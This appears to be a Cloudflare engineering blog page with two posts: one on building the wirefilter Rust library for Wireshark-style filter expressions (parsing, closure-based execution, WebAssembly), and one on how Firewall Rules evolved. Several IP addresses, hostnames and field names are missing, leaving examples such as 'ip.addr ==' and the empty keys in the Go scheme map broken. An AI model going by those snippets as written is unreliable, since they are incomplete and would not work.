This vulnerability was weaponized within two days of disclosure, but that is by no means the shortest time frame we’ve seen.It’s very hard to patch systems quickly enough to ensure that attackers don’t get through, so products like Cloudflare’s WAF are a vital line of defense against these emerging vulnerabilities.

Building fast interpreters in Rust

In the previous post we described the Firewall Rules architecture and how the different components are integrated together. We also mentioned that we created a configurable Rust library for writing and executing Wireshark®-like filters in different parts of our stack written in Go, Lua, C, C++ and JavaScript Workers.

With a mixed set of requirements – performance, memory safety, low memory use, and the capability to be part of other products that we’re working on, like Spectrum – Rust stood out as the strongest option. We have now open-sourced this library under our GitHub account. This post will dive into its design, explain why we didn’t use a parser generator, and show how our execution engine balances security, runtime performance and compilation cost for the generated filters.

Parsing Wireshark syntax

When building a custom Domain Specific Language (DSL), the first thing we need to be able to do is parse it. This should result in an intermediate representation (usually called an Abstract Syntax Tree) that can be inspected, traversed, analysed and, potentially, serialised. There are different ways to perform such a conversion, such as:

- Manual char-by-char parsing using state machines, regular expressions and/or native string APIs.
- Parser combinators, which use higher-level functions to combine different parsers together (in Rust-land these are represented by nom, chomp, combine and others).
- Fully automated generators which, provided with a grammar, can generate a fully working parser for you (examples are peg, pest, LALRPOP, etc.).

Wireshark syntax

But before trying to figure out which approach would work best for us, let’s take a look at some of the simple official Wireshark examples, to understand what we’re dealing with:

```
ip.len le 1500
udp contains 81:60:03
sip.To contains "a1762"
http.request.uri matches "gl=se$"
eth.dst == ff:ff:ff:ff:ff:ff
ip.addr ==
ipv6.addr == ::1
```

You can see that the right hand side of a comparison can be a number, an IPv4 / IPv6 address, a set of bytes or a string.
They are used interchangeably, without any special notion of a type, which is fine given that they are easily distinguishable… or are they? Let’s take a look at some IPv6 forms from Wikipedia:

```
2001:0db8:0000:0000:0000:ff00:0042:8329
2001:db8:0:0:0:ff00:42:8329
2001:db8::ff00:42:8329
```

So an IPv6 address can be written as a set of up to 8 colon-separated hexadecimal numbers, each containing up to 4 digits, with leading zeros omitted for convenience. This appears suspiciously similar to the syntax for byte sequences. Indeed, if we try writing out a sequence like 2f:31:32:33:34:35:36:37, it is simultaneously a valid IPv6 address and a valid byte sequence in terms of Wireshark syntax.

There is no way of telling what this sequence actually represents without looking at the type of the field it’s being compared with, and if you try using this sequence in Wireshark, you’ll notice that it does just that:

- ipv6.addr == 2f:31:32:33:34:35:36:37: the right hand side is parsed and used as an IPv6 address
- http.request.uri == 2f:31:32:33:34:35:36:37: the right hand side is parsed and used as a byte sequence (it will match the URL "/1234567")

Are there other examples of such ambiguities? Yup – for example, a single number with two decimal digits:

- tcp.port == 80: matches any traffic on port 80 (HTTP)
- http.file_data == 80: matches any HTTP request/response with a body containing a single byte (0x80)

We could also do the same with Ethernet addresses, defined as a separate type in Wireshark, but, for simplicity, we represent them as regular byte sequences in our implementation, so there is no ambiguity there.

Choosing a parsing approach

This is an interesting syntax design decision. It means that we need to store a mapping between field names and types ahead of time – a Scheme, as we call it – and use it for contextual parsing.
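To make the idea concrete, here is a toy sketch – in JavaScript for brevity, since the actual library is in Rust – of how a scheme drives the interpretation of an ambiguous right-hand side. The field names are real Wireshark fields, but the type labels and function names are our own illustration.

```javascript
// Toy contextual parsing: the same token means different things depending on
// the declared type of the field it is compared with.
const scheme = { 'ipv6.addr': 'ip', 'http.request.uri': 'bytes' };

function parseRhs(field, token) {
  switch (scheme[field]) {
    case 'ip':
      // In a real parser this would delegate to a proper IP address parser.
      return { type: 'ip', value: token };
    case 'bytes':
      if (/^[0-9a-f]{2}(:[0-9a-f]{2})*$/i.test(token)) {
        return { type: 'bytes', value: token.split(':').map(b => parseInt(b, 16)) };
      }
      return { type: 'string', value: token };
    default:
      throw new Error(`unknown field: ${field}`);
  }
}
```

Under `'ipv6.addr'` the token `2f:31:32:33:34:35:36:37` is treated as an IP, while under `'http.request.uri'` the very same token becomes the byte sequence for the string "/1234567" – the ambiguity described above, resolved by the scheme.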
This restriction also immediately rules out many, if not most, parser generators. We could still use one of the more sophisticated ones (like LALRPOP) that allow replacing the default regex-based lexer with custom code, but at that point we’re so close to having a full parser for our DSL that the complexity outweighs any benefits of using a black-box parser generator.

Instead, we went with a manual parsing approach. While (for good reason) this might sound scary in unsafe languages like C / C++, in Rust all strings are bounds-checked by default. Rust also provides a rich string manipulation API, which we can use to build more complex helpers, eventually ending up with a full parser.

This approach is, in fact, pretty similar to parser combinators, in that the parser doesn’t have to keep state and only passes the unprocessed part of the input down to smaller, narrower-scoped functions. Just as with parser combinators, the absence of mutable state also allows us to easily test and maintain each of the parsers for different parts of the syntax independently of the others. Compared with popular parser combinator libraries in Rust, one of the differences is that our parsers are not standalone functions but rather types that implement common traits:

```rust
pub trait Lex<'i>: Sized {
    fn lex(input: &'i str) -> LexResult<'i, Self>;
}

pub trait LexWith<'i, E>: Sized {
    fn lex_with(input: &'i str, extra: E) -> LexResult<'i, Self>;
}
```

The lex method, or its contextual variant lex_with, can either return a successful pair of (instance of the type, rest of input) or a pair of (error kind, relevant input span). The Lex trait is used for target types that can be parsed independently of the context (like field names or literals), while LexWith is used for types that need a Scheme, or a part of it, to be parsed unambiguously.

A bigger difference is that, instead of relying on higher-level functions for parser combinators, we use the usual imperative function call syntax.
For example, when we want to perform sequential parsing, all we do is call several parsers in a row, using tuple destructuring for intermediate results:

```rust
let input = skip_space(input);
let (op, input) = CombinedExpr::lex_with(input, scheme)?;
let input = skip_space(input);
let input = expect(input, ")")?;
```

And, when we want to try different alternatives, we can use native pattern matching and ignore the errors:

```rust
if let Ok(input) = expect(input, "(") {
    // ...
    (SimpleExpr::Parenthesized(Box::new(op)), input)
} else if let Ok((op, input)) = UnaryOp::lex(input) {
    // ...
} else {
    // ...
}
```

Finally, when we want to automate the parsing of some more complicated common cases – say, enums – Rust provides a powerful macro syntax:

```rust
lex_enum!(#[repr(u8)] OrderingOp {
    "eq" | "==" => Equal = EQUAL,
    "ne" | "!=" => NotEqual = LESS | GREATER,
    "ge" | ">=" => GreaterThanEqual = GREATER | EQUAL,
    "le" | "<=" => LessThanEqual = LESS | EQUAL,
    "gt" | ">" => GreaterThan = GREATER,
    "lt" | "<" => LessThan = LESS,
});
```

This gives an experience similar to parser generators, while still using native language syntax and keeping us in control of all the implementation details.

Execution engine

Because our grammar and operations are fairly simple, we initially used direct AST interpretation, by requiring all nodes to implement a trait that includes an execute method:

```rust
trait Expr<'s> {
    fn execute(&self, ctx: &ExecutionContext<'s>) -> bool;
}
```

The ExecutionContext is pretty similar to a Scheme, but instead of mapping arbitrary field names to their types, it maps them to the runtime input values provided by the caller. As with Scheme, ExecutionContext initially used an internal HashMap for registering these arbitrary String -> RhsValue mappings.
During the execute call, the AST implementation would evaluate itself recursively and look up each field reference in this map, either returning a value or raising an error on missing slots and type mismatches.

This worked well enough for an initial implementation, but using a HashMap has a non-trivial cost that we wanted to eliminate. We had already switched to a more efficient hasher – Fnv – because we are in control of all the keys and so are not worried about hash-DoS attacks, but there was still more we could do.

Speeding up field access

If we look at the data structures involved, we can see that the scheme is always well-defined in advance, and all our runtime values in the execution engine are expected to eventually match it, even if the order or the precise set of fields is not guaranteed. So what if we ditch the second map altogether and instead use a fixed-size array of values? Array indexing should be much cheaper than a map lookup, so it might well be worth the effort.

How can we do it? We already know the number of items (thanks to the predefined scheme), so we can use that for the size of the backing storage, and, in order to simulate HashMap “holes” for unset values, we can wrap each item in an Option<...>:

```rust
pub struct ExecutionContext<'e> {
    scheme: &'e Scheme,
    values: Box<[Option<LhsValue<'e>>]>,
}
```

The only missing piece is an index that could map both structures to each other. As you might remember, Scheme still uses a HashMap for field registration, and a HashMap is normally expected to be randomised and indexed only by the predefined key. While we could wrap a value and an auto-incrementing index together into a custom struct, there is already a better solution: IndexMap.
IndexMap is a drop-in replacement for a HashMap that preserves ordering and provides a way to get the index of any element, and vice versa – exactly what we needed. After replacing the HashMap in the Scheme with an IndexMap, we can change parsing to resolve all the parsed field names to their indices in place and store those in the AST:

```rust
impl<'i, 's> LexWith<'i, &'s Scheme> for Field<'s> {
    fn lex_with(mut input: &'i str, scheme: &'s Scheme) -> LexResult<'i, Self> {
        // ...
        let field = scheme
            .get_field_index(name)
            .map_err(|err| (LexErrorKind::UnknownField(err), name))?;
        Ok((field, input))
    }
}
```

After that, in the ExecutionContext we allocate a fixed-size array and use these indices for resolving values at runtime:

```rust
impl<'e> ExecutionContext<'e> {
    /// Creates an execution context associated with a given scheme.
    ///
    /// This scheme will be used for resolving any field names and indices.
    pub fn new<'s: 'e>(scheme: &'s Scheme) -> Self {
        ExecutionContext {
            scheme,
            values: vec![None; scheme.get_field_count()].into(),
        }
    }
    // ...
}
```

This gave significant (~2x) speed-ups on our standard benchmarks.

Before:

```
test matching ... bench:       2,548 ns/iter (+/- 98)
test parsing  ... bench:     192,037 ns/iter (+/- 21,538)
```

After:

```
test matching ... bench:       1,227 ns/iter (+/- 29)
test parsing  ... bench:     197,574 ns/iter (+/- 16,568)
```

This change also improved the usability of our API, as any type errors are now detected and reported much earlier, when the values are first set on the context, rather than being delayed until filter execution.

[not] JIT compilation

Of course, as with any respectable DSL, one of the other ideas we had from the beginning was “…at some point we’ll add native compilation to make everything super-fast, it’s just a matter of time…”. In practice, however, native compilation is a complicated matter – though not due to a lack of tools. First of all, there is the question of storage for the native code.
We could compile each filter statically into some sort of library and publish it to a key-value store, but that would not be easy to maintain:

- We would have to compile each filter for several platforms (x86-64, ARM, WASM, …).
- The overhead of native library formats would significantly outweigh the useful executable size, as most filters tend to be small.
- Each time we’d like to change our execution logic, whether to optimise it or to fix a bug, we would have to recompile and republish all the previously stored filters.
- Finally, even if we’re sure of the reliability of the chosen store, executing dynamically retrieved native code on the edge as-is is not something that can be taken lightly.

The usual, more flexible alternative that addresses most of these issues is Just-in-Time (JIT) compilation. When you compile code directly on the target machine, you get to re-verify the input (still expressed as a restricted DSL), you can compile it just for the current platform in place, and you never need to republish the actual rules.

Looks like a perfect fit? Not quite. As with any technology, there are tradeoffs, and you only get to choose those that make more sense for your use cases. JIT compilation is no exception. First of all, even though you’re not loading untrusted code over the network, you still need to generate it into memory, mark that memory as executable, and trust that it will always contain valid code and not garbage or something worse. Depending on your choice of libraries and the complexity of the DSL, you might be willing to trust it or to put heavy sandboxing around it, but, either way, it’s a risk that one must explicitly be willing to take. Another issue is the cost of compilation itself.
Usually, when measuring the speed of native code vs interpretation, the cost of compilation is not taken into account because it happens out of process. With JIT compilers, though, it’s different: you’re compiling things the moment they’re used and caching the native code only for a limited time. It turns out that generating native code can be rather expensive, so you must be absolutely sure that the compilation cost doesn’t offset any benefits you might gain from the native execution speedup.

I’ve talked a bit more about this at the Rust Austin meetup and, I believe, this topic deserves a separate blog post, so I won’t go into much more detail here, but feel free to check out the slides. Oh, and if you’re in Austin, you should pop into our office for the next meetup!

Let’s get back to our original question: is there anything else we can do to get the best balance between security, runtime performance and compilation cost? It turns out there is.

Dynamic dispatch and closures to the rescue

Introducing the Fn trait! In Rust, the Fn trait and its friends (FnMut, FnOnce) are automatically implemented on eligible functions and closures. In the simple Fn case, the restriction is that they must not modify their captured environment and can only borrow from it. Normally, you would use it in generic contexts to support arbitrary callbacks with given argument and return types.
This is important because in Rust each function and closure has a unique type, and any generic usage compiles down to a specific call to just that function:

```rust
fn just_call(me: impl Fn(), maybe: bool) {
    if maybe {
        me()
    }
}
```

Such behaviour (called static dispatch) is the default in Rust and is preferable for performance reasons. However, if we don’t know all the possible types at compile time, Rust allows us to opt in to dynamic dispatch instead:

```rust
fn just_call(me: &dyn Fn(), maybe: bool) {
    if maybe {
        me()
    }
}
```

Dynamically dispatched objects don't have a statically known size, because it depends on the implementation details of the particular type being passed, so they need to be passed as a reference or stored in a heap-allocated Box; after that, they can be used just like in a generic implementation. In our case, this allows us to create, return and store arbitrary closures, and later call them as regular functions:

```rust
trait Expr<'s> {
    fn compile(self) -> CompiledExpr<'s>;
}

pub(crate) struct CompiledExpr<'s>(Box<dyn 's + Fn(&ExecutionContext<'s>) -> bool>);

impl<'s> CompiledExpr<'s> {
    /// Creates a compiled expression IR from a generic closure.
    pub(crate) fn new(closure: impl 's + Fn(&ExecutionContext<'s>) -> bool) -> Self {
        CompiledExpr(Box::new(closure))
    }

    /// Executes a filter against a provided context with values.
    pub fn execute(&self, ctx: &ExecutionContext<'s>) -> bool {
        self.0(ctx)
    }
}
```

The closure (an Fn box) will also automatically capture the environment data it needs for execution. This means that we can optimise the runtime data representation as part of the “compile” process, without changing the AST or the parser.
For example, when we wanted to optimise IP range checks by splitting them for different IP types, we could do that without having to modify any existing structures:RhsValues::Ip(ranges) => { let mut v4 = Vec::new(); let mut v6 = Vec::new(); for range in ranges { match range.clone().into() { ExplicitIpRange::V4(range) => v4.push(range), ExplicitIpRange::V6(range) => v6.push(range), } } let v4 = RangeSet::from(v4); let v6 = RangeSet::from(v6); CompiledExpr::new(move |ctx| { match cast!(ctx.get_field_value_unchecked(field), Ip) { IpAddr::V4(addr) => v4.contains(addr), IpAddr::V6(addr) => v6.contains(addr), } }) } Moreover, boxed closures can be part of that captured environment, too. This means that we can convert each simple comparison into a closure, and then combine it with other closures, and keep going until we end up with a single top-level closure that can be invoked as a regular function to evaluate the entire filter expression.It’s turtles closures all the way down:let items = items .into_iter() .map(|item| item.compile()) .collect::<Vec<_>>() .into_boxed_slice(); match op { CombiningOp::And => { CompiledExpr::new(move |ctx| items.iter().all(|item| item.execute(ctx))) } CombiningOp::Or => { CompiledExpr::new(move |ctx| items.iter().any(|item| item.execute(ctx))) } CombiningOp::Xor => CompiledExpr::new(move |ctx| { items .iter() .fold(false, |acc, item| acc ^ item.execute(ctx)) }), } What’s nice about this approach is:Our execution is no longer tied to the AST, and we can be as flexible with optimising the implementation and data representation as we want without affecting the parser-related parts of code or output format.Even though we initially “compile” each node to a single closure, in future we can pretty easily specialise certain combinations of expressions into their own closures and so improve execution speed for common cases. 
All that would be required is a separate match branch returning a closure optimised for just that case.Compilation is very cheap compared to real code generation. While it might seem that allocating many small objects (one Boxed closure per expression) is not very efficient and that it would be better to replace it with some sort of a memory pool, in practice we saw a negligible performance impact.No native code is generated at runtime, which means that we execute only code that was statically verified by Rust at compile-time and compiled down to a static function. All that we do at the runtime is call existing functions with different values.Execution turns out to be faster too. This initially came as a surprise, because dynamic dispatch is widely believed to be costly and we were worried that it would get slightly worse than AST interpretation. However, it showed an immediate ~10-15% runtime improvement in benchmarks and on real examples.The only obvious downside is that each level of AST requires a separate dynamically-dispatched call instead of a single inlined code for the entire expression, like you would have even with a basic template JIT.Unfortunately, such output could be achieved only with real native code generation, and, for our case, the mentioned downsides and risks would outweigh runtime benefits, so we went with the safe & flexible closure approach.Bonus: WebAssembly supportAs was mentioned earlier, we chose Rust as a safe high-level language that allows easy integration with other parts of our stack written in Go, C and Lua via C FFI. But Rust has one more target it invests in and supports exceptionally well: WebAssembly.Why would we be interested in that? Apart from the parts of the stack where our rules would run, and the API that publishes them, we also have users who like to write their own rules. 
To do that, they use a UI editor that allows either writing raw expressions in Wireshark syntax or using a WYSIWYG builder. We thought it would be great to expose the parser – the same one we use on the backend – to the frontend JavaScript for a consistent real-time editing experience. And, honestly, we were just looking for an excuse to play with WASM support in Rust.

WebAssembly could be targeted via the regular C FFI, but in that case you would need to manually provide all the glue for the JavaScript side to hold and convert strings, arrays and objects back and forth. In Rust, this is all handled by wasm-bindgen. While it provides various attributes and methods for direct conversions, the simplest way to get started is to activate the “serde” feature, which will automatically convert types using JSON.parse, JSON.stringify and serde_json under the hood. In our case, a wrapper for the parser of only 20 lines of code was enough to get started and have all the WASM code + JavaScript glue we required:

```rust
#[wasm_bindgen]
pub struct Scheme(wirefilter::Scheme);

fn into_js_error(err: impl std::error::Error) -> JsValue {
    js_sys::Error::new(&err.to_string()).into()
}

#[wasm_bindgen]
impl Scheme {
    #[wasm_bindgen(constructor)]
    pub fn try_from(fields: &JsValue) -> Result<Scheme, JsValue> {
        fields.into_serde().map(Scheme).map_err(into_js_error)
    }

    pub fn parse(&self, s: &str) -> Result<JsValue, JsValue> {
        let filter = self.0.parse(s).map_err(into_js_error)?;
        JsValue::from_serde(&filter).map_err(into_js_error)
    }
}
```

And by using a higher-level tool called wasm-pack, we also got automated npm package generation and publishing for free. This is not used in the production UI yet, because we still need to figure out some details for unsupported browsers, but it’s great to have all the tooling and packages ready with minimal effort.
By extending and reusing the same package, it should even be possible to run filters in Cloudflare Workers too (which also support WebAssembly).

The future

The code in its current state is already doing its job well in production, and we're happy to share it with the open-source Rust community. This is definitely not the end of the road though - we have many more fields to add, features to implement and planned optimisations to explore. If you find this sort of work interesting and would like to help us by working on firewalls, parsers or any Rust project at scale, give us a shout!

How we made Firewall Rules

Recently we launched Firewall Rules, a new feature that allows you to construct expressions that perform complex matching against HTTP requests and then choose how that traffic is handled. As a firewall feature you can, of course, block traffic. The expressions we support within Firewall Rules, along with powerful control over the order in which they are applied, allow complex new behaviour.

In this blog post I tell the story of Cloudflare's Page Rules mechanism and how Firewall Rules came to be. Along the way I'll look at the technical choices that led to us building the new matching engine in Rust.

The evolution of the Cloudflare Firewall

Cloudflare offers two types of firewall for web applications: a managed firewall in the form of a WAF, where we write and maintain the rules for you, and a configurable firewall, where you write and maintain rules. In this article, we will focus on the configurable firewall.

One of the earliest Cloudflare firewall features was the IP Access Rule. It dates back to the earliest versions of the Cloudflare Firewall and simply allows you to block traffic from specific IP addresses:

if request IP equals then block the request

As attackers and spammers frequently launched attacks from a given network, we also introduced the ASN matching capability:

if request IP belongs to ASN 64496 then block the request

We also allowed blocking ranges of addresses defined by CIDR notation, for when an IP was too specific and an ASN too broad:

if request IP is within then block the request

Blocking is not the only action you might need, so other actions are available:

Whitelist = apply no other firewall rules and allow the request to pass this part of the firewall
Challenge = issue a CAPTCHA and, if this is passed, allow the request but otherwise deny it. This would be used to determine if the request came from a human operator
JavaScript challenge = issue an automated JavaScript challenge and, if this is passed, allow the request.
This would be used to determine if the request came from a simple stateless bot (perhaps a wget or curl script)
Block = deny the request

Cloudflare also has Page Rules. Page Rules allow you to match full URIs and then perform actions such as redirects, or to raise the security level, which can be considered firewall functions:

if request URI matches /nullroute then redirect to

We also added GeoIP information within an HTTP header, and the firewall was extended to include that:

if request IP originates from country GB then CAPTCHA the request

All of the above existed in Cloudflare pre-2014. Then, during 2016, we set about identifying the most commonly requested firewall features (according to Customer Support tickets and feedback from paying customers) and providing a self-service solution. From that analysis, we added three new capabilities during late 2016: Rate Limiting, User Agent Rules, and Zone Lockdown.

Whilst Cloudflare automatically stops very large denial of service attacks, Rate Limiting allowed customers to stop smaller attacks that were a real concern to them but were low enough volume that Cloudflare's DDoS defences were not being applied:

if request method is POST and request URI matches /wp-admin/index.php and response status code is 403 and more than 3 requests like this occur in a 15 minute time period then block the traffic for 2 hours

User Agent Rules are as simple as:

if request user_agent is `Fake User Agent` then CAPTCHA the request

Zone Lockdown, however, was the first default-deny feature. The Cloudflare Firewall could be thought of as "allow all traffic, except where a rule exists to block it". Zone Lockdown is the opposite: "for a given URI, block all traffic, except where a rule exists to allow it".

Zone Lockdown allowed customers to block access to a public website for all but a few IP addresses or IP ranges.
For example, many customers wanted access to a staging website to be available only to their office IP addresses:

if request URI matches and request IP not in then block the request

Finally, an Enterprise customer could also contact Cloudflare and have a truly bespoke rule created for them within the WAF engine.

Seeing the problem

The firewall worked well for simple mitigation, but it didn't fully meet the needs of our customers. Each of the firewall features targeted a single attribute, and the interfaces and implementations reflected that. Whilst the Cloudflare Firewall had evolved to solve each problem as it arose, these features did not work together. In late 2017 you could sum up the firewall capabilities as: you can block any attack traffic on any criteria, so long as you only pick one of:

IP
CIDR
ASN
Country
User Agent
URI

We saw the problem, but how to fix it?

We match our firewall rules in two ways:

Lookup matching
String pattern matching

Lookup matching covers the IP, CIDR, ASN, Country and User Agent rules. We would create a key in Quicksilver, our globally distributed key/value data store, and store the action in the value:

Key = zone:www.example.com_ip: Value = block

When a request for is received, we look at the IP address of the client that made the request, construct the key and perform the lookup. If the key exists in the store, then the value tells us what action to perform; in this case, if the client IP matched then we would block the request.

Lookup matching is a joy to work with: it is O(1) complexity, meaning that a single request performs only a single lookup for an IP rule regardless of how many IP rules a customer has. Whilst most customers had a few rules, some customers had hundreds of thousands of rules (typically created automatically by combining fail2ban or similar with a Cloudflare API call).

Lookups work well when you are only looking up a single value.
If you need to combine an IP and a User Agent, we would need to produce keys that compose these values together. This massively increases the number of keys that you need to publish.

String pattern matching occurs where URI matching is required. For our Page Rules feature this meant combining all of the Page Rules into a single regular expression that we would apply to the request URI whilst handling a request.

If you had Page Rules that said (in order):

Match */wp-admin/index.php and then block
Then match */xmlrpc.php and then block

These are converted into:

^(?<block__1>(?:.*/wp-admin/index.php))|(?<block__2>(?:.*/xmlrpc.php))$

Yes, you read that correctly. Each Page Rule was appended to a single regular expression in the order of execution, and the named capture group is used as an overload for the desired action.

This works surprisingly well, as regular expression matching can be simple and fast, especially when the regular expression matches against a single value like the URI. But as soon as you want to match the URI plus an IP range, it becomes less obvious how to extend this.

This is what we had: a set of features that worked really well, providing you wanted to match a single property of a request. The implementation also meant that none of these features could be trivially extended to embrace multiple properties at a time. We needed something else - a fast way to compute whether a request matches a rule that could contain multiple properties as well as pattern matching.

A solution that works now and in the future

Over time Cloudflare engineers authored internal posts exploring how a new matching engine might work. The first thing that occurred to every engineer was that the matching must be an expression. These ideas followed a similar approach, in which we would construct an expression within JSON as a DSL (Domain Specific Language) of our expression language.
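The ordered, first-match-wins behaviour that the combined regular expression encodes can be illustrated without a regex engine. In this sketch, plain suffix matching stands in for the real patterns to keep the example dependency-free; the rule ordering and action-per-pattern structure is the part being demonstrated:

```rust
// A sketch of the Page Rules matching model: rules are evaluated in
// order and the first match determines the action, just as the named
// capture groups in the combined regex overload the action.
fn first_matching_action<'a>(
    uri: &str,
    rules: &[(&str, &'a str)], // (path suffix, action), in order
) -> Option<&'a str> {
    rules
        .iter()
        .find(|(suffix, _)| uri.ends_with(suffix))
        .map(|(_, action)| *action)
}

fn main() {
    let rules = [
        ("/wp-admin/index.php", "block"), // like (?<block__1>...)
        ("/xmlrpc.php", "block"),         // like (?<block__2>...)
    ];

    assert_eq!(first_matching_action("/blog/xmlrpc.php", &rules), Some("block"));
    assert_eq!(first_matching_action("/index.html", &rules), None);
}
```

As the post notes, this model only works while there is a single value (the URI) to match against; composing it with an IP range has no natural equivalent in one regex.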
This DSL could describe matching a request, a UI could render it, and a backend could process it. Early proposals looked like this:

{
  "And": [
    { "Equals": { "host": "" } },
    {
      "Or": [
        { "Regex": { "path": "^(?:.*/wp-admin/index.php)$" } },
        { "Regex": { "path": "^(?:.*/xmlrpc.php)$" } }
      ]
    }
  ]
}

The JSON describes an expression that computers can easily turn into a rule to apply, but people find it hard to read and work with. As we did not wish to display JSON like this in our dashboard, we thought about how we might summarise it for a UI:

if request host equals and (request path matches ^(?:.*/wp-admin/index.php)$ or request path matches ^(?:.*/xmlrpc.php)$)

And there came an epiphany. As engineers, we had seen an expression language similar to this before, so may I introduce to you our old friend Wireshark®.

Wireshark is a network protocol analyzer. To use it you must run a packet capture to record network traffic from a capture device (usually a network card). This is then saved to disk as a .pcap file, which you subsequently open in the Wireshark GUI. The Wireshark GUI has a display filter entry box, and when you fill in a display filter the GUI will dissect the saved packet capture, determining which packets match the expression and showing those in the GUI.

But we don't need to do that.
In fact, for our scenario that approach does not work, as we have a firewall and need to make decisions in real time as part of HTTP request handling, rather than via a packet capture process.

For Cloudflare, we would want to use something like the Wireshark display filter expression language, but without the capture and dissection, as we would want to do this potentially thousands of times per request without noticeable delay.

If we were able to use a Wireshark-style expression language, then we could reduce the JSON-encapsulated expression above to:

eq "" and (http.request.path ~ "wp-admin/index\.php" or http.request.path ~ "xmlrpc.php")

This is human readable, machine parseable and succinct. It also benefits from being highly similar to Wireshark: for security engineers used to working with Wireshark when investigating attacks, it offers a degree of portability from an investigation tool to a mitigation engine.

To make this work we would need to collect the properties of the request into a simple data structure to match the expressions against. Unlike the packet capture approach, we run our firewall within the context of an HTTP server, and the web server has already computed the request properties, so we can avoid dissection and populate the fields from the web server's knowledge:

Field: Value
http.cookie: session=8521F670545D7865F79C3D7BEDC29CCE;-background=light
http.referer:
http.request.method: GET
http.request.uri: /articles/index?section=539061&expand=comments
http.request.uri.path: /articles/index
http.request.uri.query: section=539061&expand=comments
http.user_agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
http.x_forwarded_for:
ip.src:
ip.geoip.asnum: 64496
: GB
ssl: true

With a table of HTTP request properties and an expression language that can provide a matching expression, we were 90% of the way towards a solution!
All we needed for the last 90% was the matching engine itself, which would provide us with an answer to the question: does this request match one of the expressions?

Enter wirefilter.

Wirefilter is the name of the Rust library that Cloudflare has created, and it provides:

The ability for Cloudflare to define a set of typed fields, i.e. ip.src is a field of type IPAddress
The ability to define a table of properties from all of the fields that are defined
The ability to parse an expression and to say whether it is syntactically valid, whether the fields in the expression are valid against the fields defined, and whether the operators used for a field are valid for the type of the field
The ability to apply an expression to a table and return a true|false response indicating whether the evaluated expression matches the request

It is named wirefilter as a hat tip towards Wireshark, for inspiring our Wireshark-like expression language, and also because in the context of the Cloudflare Firewall these expressions act as a filter over traffic.

The implementation of wirefilter allows us to embed this matching engine within our REST API, which is written in Go:

// scheme stores the list of fields and their types that an expression can use
var scheme = filterexpr.Scheme{
    "http.cookie":            filterexpr.TypeString,
    "":                       filterexpr.TypeString,
    "http.referer":           filterexpr.TypeString,
    "http.request.full_uri":  filterexpr.TypeString,
    "http.request.method":    filterexpr.TypeString,
    "http.request.uri":       filterexpr.TypeString,
    "http.request.uri.path":  filterexpr.TypeString,
    "http.request.uri.query": filterexpr.TypeString,
    "http.user_agent":        filterexpr.TypeString,
    "http.x_forwarded_for":   filterexpr.TypeString,
    "ip.src":                 filterexpr.TypeIP,
    "ip.geoip.asnum":         filterexpr.TypeNumber,
    "":                       filterexpr.TypeString,
    "ssl":                    filterexpr.TypeBool,
}

Later we validate expressions provided to the API:

// expression here is a string that may look like:
// `ip.src eq`
expressionHash, err := filterexpr.ValidateFilter(scheme, expression)
if fve, ok := err.(*filterexpr.ValidationError); ok {
    validationErrs = append(validationErrs, fve.Ascii)
} else if err != nil {
    return nil, stderrors.Errorf("failed to validate filter: %v", err)
}

This tells us whether the expression is syntactically correct and whether the field operators and values match the field type. If the expression is valid, then we can use the returned hash to determine uniqueness (the hash is generated inside wirefilter so that uniqueness can ignore whitespace and minor differences).

The expressions are then published to our global network of PoPs and consumed by Lua within our web proxy. The web proxy has the same list of fields as the API, and is responsible for building the table of properties from the context within the web proxy:

-- The `traits` table defines the mapping between the fields and
-- the corresponding values from the nginx evaluation context.
local traits = {
    [''] = field.str(function(ctx)
        return
    end),
    ['http.cookie'] = field.str(function(ctx)
        local value = ctx.req_headers.cookie or ''
        if type(value) == 'table' then
            value = table.concat(value, ";")
        end
        return value
    end),
    ['http.referer'] = field.str(function(ctx)
        return ctx.req_headers.referer or ''
    end),
    ['http.request.method'] = field.str(function(ctx)
        return ctx.method
    end),
    ['http.request.uri'] = field.str(function(ctx)
        return ctx.rewrite_uri or ctx.request_uri
    end),
    ['http.request.uri.path'] = field.str(function(ctx)
        return ctx.uri or '/'
    end),
    ...

With this per-request table describing a request, we can test the filters. In our case, what we're doing here is:

Fetch a list of all the expressions we would like to match against the request
Check whether any expression, when applied via wirefilter to the table above, returns true as having matched
For all matched expressions, check the associated actions and their priority

The actions are not part of the matching itself.
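The per-request matching loop just described can be sketched as follows. This is an illustration only: the `Filter` closure type stands in for wirefilter's real compiled expressions, and the field names and actions are examples.

```rust
use std::collections::HashMap;

// Hypothetical stand-ins for the per-request property table and a
// compiled wirefilter expression.
type Table = HashMap<&'static str, String>;
type Filter = Box<dyn Fn(&Table) -> bool>;

struct Rule {
    filter: Filter,
    action: &'static str,
}

// Run every published expression against the request's property
// table and collect the actions of the rules that matched. Deciding
// which action wins is a separate, later step.
fn matched_actions<'a>(rules: &'a [Rule], table: &Table) -> Vec<&'a str> {
    rules
        .iter()
        .filter(|r| (r.filter)(table))
        .map(|r| r.action)
        .collect()
}

fn main() {
    let rules = vec![
        Rule {
            filter: Box::new(|t: &Table| {
                t.get("http.request.method").map(String::as_str) == Some("POST")
            }),
            action: "block",
        },
        Rule {
            filter: Box::new(|t: &Table| {
                t.get("ssl").map(String::as_str) == Some("false")
            }),
            action: "challenge",
        },
    ];

    let mut table = Table::new();
    table.insert("http.request.method", "POST".into());
    table.insert("ssl", "true".into());

    // Only the first rule matches this request.
    assert_eq!(matched_actions(&rules, &table), vec!["block"]);
}
```

Keeping matching and action selection separate is what allows several rules to match the same request without ambiguity at this stage.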
Once we have a list of matched expressions, we determine which action takes precedence, and that is the one we will execute.

Wirefilter, then, is a generic library that provides this matching capability. We have plugged it into our Go APIs and our Lua web proxy, and we use it to power the Cloudflare Firewall.

We chose Rust for wirefilter because, early in the project, we recognised that if we attempted separate implementations in Go and Lua, the result would be inconsistencies that attackers might be able to exploit. We needed our API and edge proxy to behave exactly the same, and for this we needed a single library that both could call. We could have chosen one of our existing languages at the edge, like C, C++, Go or Lua, or even implemented this not as a library but as a worker in JavaScript. With a mixed set of requirements of performance, memory safety, low memory use, and the capability to be part of other products that we're working on like Spectrum, Rust stood out as the strongest option.

With a library in place and the ability to match all HTTP traffic, how do we get that to a public API and UI without diluting the capability? The problems that arose related to specificity and mutual exclusion.

